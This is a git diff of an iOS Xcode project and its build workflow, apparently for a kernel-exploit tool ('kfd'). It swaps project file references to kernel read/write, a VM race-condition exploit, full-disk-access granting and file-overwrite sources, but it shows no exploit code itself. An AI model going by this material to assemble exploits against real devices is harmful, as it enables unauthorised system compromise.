diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 4fff95e8..cc040bbf 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -21,9 +21,6 @@ jobs:
 - name: Build IPA
 run: |
- cd MiniRootFileManager15
- git apply -p1 ../submodule.patch
- cd ..
 make
 - name: Upload IPA
diff --git a/kfd.xcodeproj/project.pbxproj b/kfd.xcodeproj/project.pbxproj
index 7e88be3f..9144ccd8 100644
--- a/kfd.xcodeproj/project.pbxproj
+++ b/kfd.xcodeproj/project.pbxproj
@@ -9,45 +9,18 @@ /* Begin PBXBuildFile section */ 297BA1092A310AE100D1E51A /* kfdApp.swift in Sources */ = {isa = PBXBuildFile; fileRef = 297BA1082A310AE100D1E51A /* kfdApp.swift */; }; 297BA10B2A310AE100D1E51A /* ContentView.swift in Sources */ = {isa = PBXBuildFile; fileRef = 297BA10A2A310AE100D1E51A /* ContentView.swift */; }; - 6E08ABFE2A9A3B9800BF5B0D /* helpers.m in Sources */ = {isa = PBXBuildFile; fileRef = 6E08ABFD2A9A3B9800BF5B0D /* helpers.m */; }; - 6E75BFA82A8475C70056ABDA /* fun.m in Sources */ = {isa = PBXBuildFile; fileRef = 6E75BFA72A8475C70056ABDA /* fun.m */; }; - 6E75BFAE2A847A980056ABDA /* offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 6E75BFAD2A847A980056ABDA /* offsets.m */; }; - 6ECE5B522A905FDE00792D41 /* proc.c in Sources */ = {isa = PBXBuildFile; fileRef = 6ECE5B512A905FDE00792D41 /* proc.c */; }; - D51A38002AB56ED900C147E2 /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = D58309A92A9BC38800828844 /* IOKit.framework */; }; - D51A38082AB56F8400C147E2 /* utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D51A38022AB56F8400C147E2 /* utils.m */; }; - D51A38092AB56F8400C147E2 /* krw.c in Sources */ = {isa = PBXBuildFile; fileRef = D51A38032AB56F8400C147E2 /* krw.c */; }; - D51A380A2AB56F8400C147E2 /* vnode.m in Sources */ = {isa = PBXBuildFile; fileRef = D51A38052AB56F8400C147E2 /* vnode.m */; }; - D51A380B2AB56F8400C147E2 /* thanks_opa334dev_htrowii.m in Sources */ = {isa = PBXBuildFile; fileRef = D51A38062AB56F8400C147E2 /* thanks_opa334dev_htrowii.m */; }; - D51A380C2AB56F8400C147E2 /* cs_blobs.m in Sources */ = {isa = PBXBuildFile; fileRef = D51A38072AB56F8400C147E2 /* cs_blobs.m */; }; D51A38112AB5717500C147E2 /* files in Resources */ = {isa = PBXBuildFile; fileRef = D51A38102AB5717500C147E2 /* files */; }; - D52BA4622AB58212002E9836 /* DirtyCowKit in Frameworks */ = {isa = PBXBuildFile; productRef = D52BA4612AB58212002E9836 /* DirtyCowKit */; }; - D52BA4652AB582C9002E9836 /* SearchBar.swift in Sources */ 
= {isa = PBXBuildFile; fileRef = D52BA4562AB5812A002E9836 /* SearchBar.swift */; }; - D52BA4662AB582C9002E9836 /* DirtyJITView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4572AB5812A002E9836 /* DirtyJITView.swift */; }; - D52BA4672AB582C9002E9836 /* AppsView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4582AB5812A002E9836 /* AppsView.swift */; }; - D52BA4692AB582C9002E9836 /* ApplicationManager.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA4512AB5812A002E9836 /* ApplicationManager.swift */; }; - D52BA46B2AB5866D002E9836 /* TextField++.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA46A2AB5866D002E9836 /* TextField++.swift */; }; - D52BA46D2AB586BF002E9836 /* Alert++.swift in Sources */ = {isa = PBXBuildFile; fileRef = D52BA46C2AB586BF002E9836 /* Alert++.swift */; }; - D58653662ABBB60E005A2379 /* vm_unaligned_copy_switch_race.c in Sources */ = {isa = PBXBuildFile; fileRef = D58653622ABBB28D005A2379 /* vm_unaligned_copy_switch_race.c */; }; - D586547C2ABD508B005A2379 /* AXLocationBackgrounder.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654582ABD508B005A2379 /* AXLocationBackgrounder.m */; }; - D586547D2ABD508B005A2379 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654592ABD508B005A2379 /* ViewController.m */; }; - D586547E2ABD508B005A2379 /* SceneDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = D586545A2ABD508B005A2379 /* SceneDelegate.m */; }; - D586547F2ABD508B005A2379 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = D586545B2ABD508B005A2379 /* LaunchScreen.storyboard */; }; - D58654802ABD508B005A2379 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = D586545D2ABD508B005A2379 /* Main.storyboard */; }; - D58654812ABD508B005A2379 /* FileManager.m in Sources */ = {isa = PBXBuildFile; fileRef = D586545F2ABD508B005A2379 /* FileManager.m */; }; - D58654822ABD508B005A2379 /* kerneldec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 
D58654602ABD508B005A2379 /* kerneldec.cpp */; }; - D58654842ABD508B005A2379 /* AXNavigationController.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654622ABD508B005A2379 /* AXNavigationController.m */; }; - D58654852ABD508B005A2379 /* AXFIle.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654632ABD508B005A2379 /* AXFIle.m */; }; - D58654862ABD508B005A2379 /* AXFileViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654652ABD508B005A2379 /* AXFileViewController.m */; }; - D58654872ABD508B005A2379 /* liblzfse.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D58654662ABD508B005A2379 /* liblzfse.a */; }; - D58654882ABD508B005A2379 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654672ABD508B005A2379 /* AppDelegate.m */; }; - D58654892ABD508B005A2379 /* lzssdec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = D58654682ABD508B005A2379 /* lzssdec.cpp */; }; - D586548A2ABD508B005A2379 /* patchfinder64.m in Sources */ = {isa = PBXBuildFile; fileRef = D58654692ABD508B005A2379 /* patchfinder64.m */; }; - D5AFB5B72ABE074C006266EA /* KFD-manager.m in Sources */ = {isa = PBXBuildFile; fileRef = D5AFB5B62ABE074C006266EA /* KFD-manager.m */; }; - D5AFB5BF2ABE1671006266EA /* LogView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D5AFB5BE2ABE1671006266EA /* LogView.swift */; }; - D5AFB5C32ABE1691006266EA /* SwiftfulLoadingIndicators in Frameworks */ = {isa = PBXBuildFile; productRef = D5AFB5C22ABE1691006266EA /* SwiftfulLoadingIndicators */; }; - D5AFB5C52ABE1781006266EA /* Logger.swift in Sources */ = {isa = PBXBuildFile; fileRef = D5AFB5C42ABE1781006266EA /* Logger.swift */; }; - D5AFB71B2AC0252D006266EA /* grant_full_disk_access.m in Sources */ = {isa = PBXBuildFile; fileRef = D58653602ABBB28D005A2379 /* grant_full_disk_access.m */; }; - D5B87E8F2B00CC2E0024E70C /* FileManager.swift in Sources */ = {isa = PBXBuildFile; fileRef = D586507E2AB9F2AF005A2379 /* FileManager.swift */; }; + D57B521E2B46995800374989 /* fun.m in 
Sources */ = {isa = PBXBuildFile; fileRef = D57B520F2B46995700374989 /* fun.m */; }; + D57B52212B46995800374989 /* helpers.m in Sources */ = {isa = PBXBuildFile; fileRef = D57B52122B46995700374989 /* helpers.m */; }; + D57B52222B46995800374989 /* utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D57B52132B46995700374989 /* utils.m */; }; + D57B52232B46995800374989 /* thanks_opa334dev_htrowii.m in Sources */ = {isa = PBXBuildFile; fileRef = D57B52142B46995700374989 /* thanks_opa334dev_htrowii.m */; }; + D57B52252B46995800374989 /* krw.c in Sources */ = {isa = PBXBuildFile; fileRef = D57B52162B46995700374989 /* krw.c */; }; + D57B52262B46995800374989 /* offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = D57B52172B46995700374989 /* offsets.m */; }; + D57B52272B46995800374989 /* vnode.m in Sources */ = {isa = PBXBuildFile; fileRef = D57B52182B46995700374989 /* vnode.m */; }; + D57B52282B46995800374989 /* proc.c in Sources */ = {isa = PBXBuildFile; fileRef = D57B52192B46995700374989 /* proc.c */; }; + D5D2DD982B46A90A00B62BED /* vm_unaligned_copy_switch_race.c in Sources */ = {isa = PBXBuildFile; fileRef = D5D2DD962B46A90A00B62BED /* vm_unaligned_copy_switch_race.c */; }; + D5D2DD9B2B46A91B00B62BED /* grant_full_disk_access.m in Sources */ = {isa = PBXBuildFile; fileRef = D5D2DD9A2B46A91B00B62BED /* grant_full_disk_access.m */; }; + D5D2DD9D2B46AC3C00B62BED /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = D5D2DD9C2B46AC3C00B62BED /* IOKit.framework */; }; /* End PBXBuildFile section */ /* Begin PBXFileReference section */ 
@@ -68,81 +41,36 @@ 297BA1102A310AE200D1E51A /* Preview Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = "Preview Assets.xcassets"; sourceTree = ""; }; 29A358F32A43B53300C297A1 /* smith.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = smith.h; sourceTree = ""; }; 29A765292A393FCB006617E8 /* perf.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = perf.h; sourceTree = ""; }; - 6E08ABFD2A9A3B9800BF5B0D /* helpers.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = helpers.m; sourceTree = ""; }; - 6E08ABFF2A9A3BA600BF5B0D /* helpers.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = helpers.h; sourceTree = ""; }; - 6E75BFA72A8475C70056ABDA /* fun.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = fun.m; sourceTree = ""; }; - 6E75BFA92A8475D30056ABDA /* fun.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = fun.h; sourceTree = ""; }; - 6E75BFAC2A8476400056ABDA /* krw.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = krw.h; sourceTree = ""; }; - 6E75BFAD2A847A980056ABDA /* offsets.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = offsets.m; sourceTree = ""; }; - 6E75BFAF2A847AC50056ABDA /* offsets.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; - 6ECE5B502A905FDE00792D41 /* proc.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = proc.h; sourceTree = ""; }; - 6ECE5B512A905FDE00792D41 /* proc.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = proc.c; sourceTree = ""; }; - 6ECE5B532A90609100792D41 /* utils.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = utils.h; sourceTree = ""; }; - 6ECE5B562A9065B300792D41 /* vnode.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vnode.h; 
sourceTree = ""; }; 8C0AF3512A75B21A0065C9DD /* kread_IOSurface.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kread_IOSurface.h; sourceTree = ""; }; 8C0AF3522A75B2DA0065C9DD /* IOSurface_shared.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOSurface_shared.h; sourceTree = ""; }; 8CC7F5312A762D46004C6F30 /* kwrite_IOSurface.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kwrite_IOSurface.h; sourceTree = ""; }; - D51A38012AB56F8400C147E2 /* cs_blobs.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = cs_blobs.h; sourceTree = ""; }; - D51A38022AB56F8400C147E2 /* utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = utils.m; sourceTree = ""; }; - D51A38032AB56F8400C147E2 /* krw.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = krw.c; sourceTree = ""; }; - D51A38042AB56F8400C147E2 /* thanks_opa334dev_htrowii.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = thanks_opa334dev_htrowii.h; sourceTree = ""; }; - D51A38052AB56F8400C147E2 /* vnode.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = vnode.m; sourceTree = ""; }; - D51A38062AB56F8400C147E2 /* thanks_opa334dev_htrowii.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = thanks_opa334dev_htrowii.m; sourceTree = ""; }; - D51A38072AB56F8400C147E2 /* cs_blobs.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = cs_blobs.m; sourceTree = ""; }; D51A38102AB5717500C147E2 /* files */ = {isa = PBXFileReference; lastKnownFileType = folder; path = files; sourceTree = ""; }; - D52BA4352AB57EC9002E9836 /* DirtyCowKit */ = {isa = PBXFileReference; lastKnownFileType = wrapper; path = DirtyCowKit; sourceTree = ""; }; - D52BA4512AB5812A002E9836 /* 
ApplicationManager.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = ApplicationManager.swift; sourceTree = ""; }; - D52BA4562AB5812A002E9836 /* SearchBar.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = SearchBar.swift; sourceTree = ""; }; - D52BA4572AB5812A002E9836 /* DirtyJITView.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = DirtyJITView.swift; sourceTree = ""; }; - D52BA4582AB5812A002E9836 /* AppsView.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = AppsView.swift; sourceTree = ""; }; - D52BA46A2AB5866D002E9836 /* TextField++.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "TextField++.swift"; sourceTree = ""; }; - D52BA46C2AB586BF002E9836 /* Alert++.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = "Alert++.swift"; sourceTree = ""; }; - D58309A92A9BC38800828844 /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; path = IOKit.framework; sourceTree = ""; }; - D586507E2AB9F2AF005A2379 /* FileManager.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = FileManager.swift; sourceTree = ""; }; - D58653602ABBB28D005A2379 /* grant_full_disk_access.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = grant_full_disk_access.m; sourceTree = ""; }; - D58653612ABBB28D005A2379 /* vm_unaligned_copy_switch_race.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = vm_unaligned_copy_switch_race.h; sourceTree = ""; }; - D58653622ABBB28D005A2379 /* vm_unaligned_copy_switch_race.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = vm_unaligned_copy_switch_race.c; sourceTree = ""; }; - 
D58653632ABBB28D005A2379 /* grant_full_disk_access.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = grant_full_disk_access.h; sourceTree = ""; }; - D58654392ABD508B005A2379 /* AXNavigationController.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = AXNavigationController.h; sourceTree = ""; }; - D586543A2ABD508B005A2379 /* lzfse_tunables.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzfse_tunables.h; sourceTree = ""; }; - D586543B2ABD508B005A2379 /* FileManager.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = FileManager.h; sourceTree = ""; }; - D58654512ABD508B005A2379 /* AppDelegate.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; - D58654522ABD508B005A2379 /* lzfse_encode_tables.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzfse_encode_tables.h; sourceTree = ""; }; - D58654532ABD508B005A2379 /* AXFileViewController.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = AXFileViewController.h; sourceTree = ""; }; - D58654542ABD508B005A2379 /* AXFile.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = AXFile.h; sourceTree = ""; }; - D58654552ABD508B005A2379 /* patchfinder64.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; - D58654562ABD508B005A2379 /* lzfse_fse.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzfse_fse.h; sourceTree = ""; }; - D58654582ABD508B005A2379 /* AXLocationBackgrounder.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = AXLocationBackgrounder.m; sourceTree = ""; }; - D58654592ABD508B005A2379 /* 
ViewController.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; - D586545A2ABD508B005A2379 /* SceneDelegate.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = SceneDelegate.m; sourceTree = ""; }; - D586545C2ABD508B005A2379 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; - D586545E2ABD508B005A2379 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; - D586545F2ABD508B005A2379 /* FileManager.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = FileManager.m; sourceTree = ""; }; - D58654602ABD508B005A2379 /* kerneldec.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; path = kerneldec.cpp; sourceTree = ""; }; - D58654622ABD508B005A2379 /* AXNavigationController.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = AXNavigationController.m; sourceTree = ""; }; - D58654632ABD508B005A2379 /* AXFIle.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = AXFIle.m; sourceTree = ""; }; - D58654642ABD508B005A2379 /* kerneldec.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kerneldec.h; sourceTree = ""; }; - D58654652ABD508B005A2379 /* AXFileViewController.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = AXFileViewController.m; sourceTree = ""; }; - D58654662ABD508B005A2379 /* liblzfse.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = liblzfse.a; sourceTree = ""; }; - D58654672ABD508B005A2379 /* AppDelegate.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = 
sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; - D58654682ABD508B005A2379 /* lzssdec.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; path = lzssdec.cpp; sourceTree = ""; }; - D58654692ABD508B005A2379 /* patchfinder64.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = patchfinder64.m; sourceTree = ""; }; - D586546A2ABD508B005A2379 /* kstruct.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kstruct.h; sourceTree = ""; }; - D586546B2ABD508B005A2379 /* lzfse_internal.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzfse_internal.h; sourceTree = ""; }; - D586546C2ABD508B005A2379 /* lzfse.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzfse.h; sourceTree = ""; }; - D586546D2ABD508B005A2379 /* lzssdec.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzssdec.h; sourceTree = ""; }; - D586546F2ABD508B005A2379 /* AXLocationBackgrounder.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = AXLocationBackgrounder.h; sourceTree = ""; }; - D58654702ABD508B005A2379 /* ViewController.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; - D58654712ABD508B005A2379 /* SceneDelegate.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = SceneDelegate.h; sourceTree = ""; }; + D57B52062B46903600374989 /* landa.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = landa.h; sourceTree = ""; }; + D57B52092B46995700374989 /* thanks_opa334dev_htrowii.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = thanks_opa334dev_htrowii.h; sourceTree = ""; }; + D57B520A2B46995700374989 /* utils.h */ = {isa = 
PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = utils.h; sourceTree = ""; }; + D57B520B2B46995700374989 /* vnode.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = vnode.h; sourceTree = ""; }; + D57B520C2B46995700374989 /* proc.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = proc.h; sourceTree = ""; }; + D57B520D2B46995700374989 /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; + D57B520E2B46995700374989 /* krw.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = krw.h; sourceTree = ""; }; + D57B520F2B46995700374989 /* fun.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = fun.m; sourceTree = ""; }; + D57B52122B46995700374989 /* helpers.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = helpers.m; sourceTree = ""; }; + D57B52132B46995700374989 /* utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = utils.m; sourceTree = ""; }; + D57B52142B46995700374989 /* thanks_opa334dev_htrowii.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = thanks_opa334dev_htrowii.m; sourceTree = ""; }; + D57B52162B46995700374989 /* krw.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = krw.c; sourceTree = ""; }; + D57B52172B46995700374989 /* offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = offsets.m; sourceTree = ""; }; + D57B52182B46995700374989 /* vnode.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = vnode.m; sourceTree = ""; }; + D57B52192B46995700374989 /* proc.c */ = {isa = PBXFileReference; fileEncoding = 4; 
lastKnownFileType = sourcecode.c.c; path = proc.c; sourceTree = ""; }; + D57B521A2B46995700374989 /* fun.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = fun.h; sourceTree = ""; }; + D57B521C2B46995700374989 /* helpers.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = helpers.h; sourceTree = ""; }; D586548D2ABD5112005A2379 /* kfd-Bridging-Header.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = "kfd-Bridging-Header.h"; sourceTree = ""; }; D58654902ABD55B3005A2379 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; - D5AFB5B52ABE074C006266EA /* KFD-manager.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = "KFD-manager.h"; sourceTree = ""; }; - D5AFB5B62ABE074C006266EA /* KFD-manager.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = "KFD-manager.m"; sourceTree = ""; }; - D5AFB5BE2ABE1671006266EA /* LogView.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = LogView.swift; sourceTree = ""; }; - D5AFB5C02ABE167C006266EA /* ProcessCommunication */ = {isa = PBXFileReference; lastKnownFileType = wrapper; path = ProcessCommunication; sourceTree = ""; }; - D5AFB5C42ABE1781006266EA /* Logger.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = Logger.swift; sourceTree = ""; }; D5CB286E2AB5D02F009DF689 /* static_info.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = static_info.h; sourceTree = ""; }; D5CB286F2AB5D02F009DF689 /* dynamic_info.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = dynamic_info.h; sourceTree = ""; }; + D5D2DD962B46A90A00B62BED /* vm_unaligned_copy_switch_race.c */ = {isa = PBXFileReference; 
fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = vm_unaligned_copy_switch_race.c; sourceTree = ""; }; + D5D2DD972B46A90A00B62BED /* vm_unaligned_copy_switch_race.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = vm_unaligned_copy_switch_race.h; sourceTree = ""; }; + D5D2DD992B46A91B00B62BED /* grant_full_disk_access.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = grant_full_disk_access.h; sourceTree = ""; }; + D5D2DD9A2B46A91B00B62BED /* grant_full_disk_access.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = grant_full_disk_access.m; sourceTree = ""; }; + D5D2DD9C2B46AC3C00B62BED /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = System/Library/Frameworks/IOKit.framework; sourceTree = SDKROOT; }; /* End PBXFileReference section */ /* Begin PBXFrameworksBuildPhase section */ @@ -150,10 +78,7 @@ isa = PBXFrameworksBuildPhase; buildActionMask = 2147483647; files = ( - D52BA4622AB58212002E9836 /* DirtyCowKit in Frameworks */, - D58654872ABD508B005A2379 /* liblzfse.a in Frameworks */, - D51A38002AB56ED900C147E2 /* IOKit.framework in Frameworks */, - D5AFB5C32ABE1691006266EA /* SwiftfulLoadingIndicators in Frameworks */, + D5D2DD9D2B46AC3C00B62BED /* IOKit.framework in Frameworks */, ); runOnlyForDeploymentPostprocessing = 0; }; @@ -190,6 +115,7 @@ children = ( 2948BA722A31636600B2ED3C /* physpuppet.h */, 29A358F32A43B53300C297A1 /* smith.h */, + D57B52062B46903600374989 /* landa.h */, ); path = puaf; sourceTree = ""; 
@@ -235,21 +161,14 @@ isa = PBXGroup; children = ( D58654902ABD55B3005A2379 /* Info.plist */, - D58654382ABD508B005A2379 /* filemanager_by_akusio */, - D52BA44F2AB5812A002E9836 /* JIT */, + 2965065E2A31565B0025D1A7 /* libkfd.h */, 2948BA6A2A3162C600B2ED3C /* libkfd */, - 6E75BFA62A8475790056ABDA /* fun */, D51A38102AB5717500C147E2 /* files */, - 297BA10C2A310AE200D1E51A /* Assets.xcassets */, - D5AFB5B62ABE074C006266EA /* KFD-manager.m */, - D5AFB5B52ABE074C006266EA /* KFD-manager.h */, - D586507E2AB9F2AF005A2379 /* FileManager.swift */, + D57B52072B46995700374989 /* overwrite */, 297BA10A2A310AE100D1E51A /* ContentView.swift */, - D5AFB5BE2ABE1671006266EA /* LogView.swift */, - D5AFB5C42ABE1781006266EA /* Logger.swift */, 297BA1082A310AE100D1E51A /* kfdApp.swift */, - 2965065E2A31565B0025D1A7 /* libkfd.h */, D586548D2ABD5112005A2379 /* kfd-Bridging-Header.h */, + 297BA10C2A310AE200D1E51A /* Assets.xcassets */, 297BA10F2A310AE200D1E51A /* Preview Content */, ); path = kfd; 
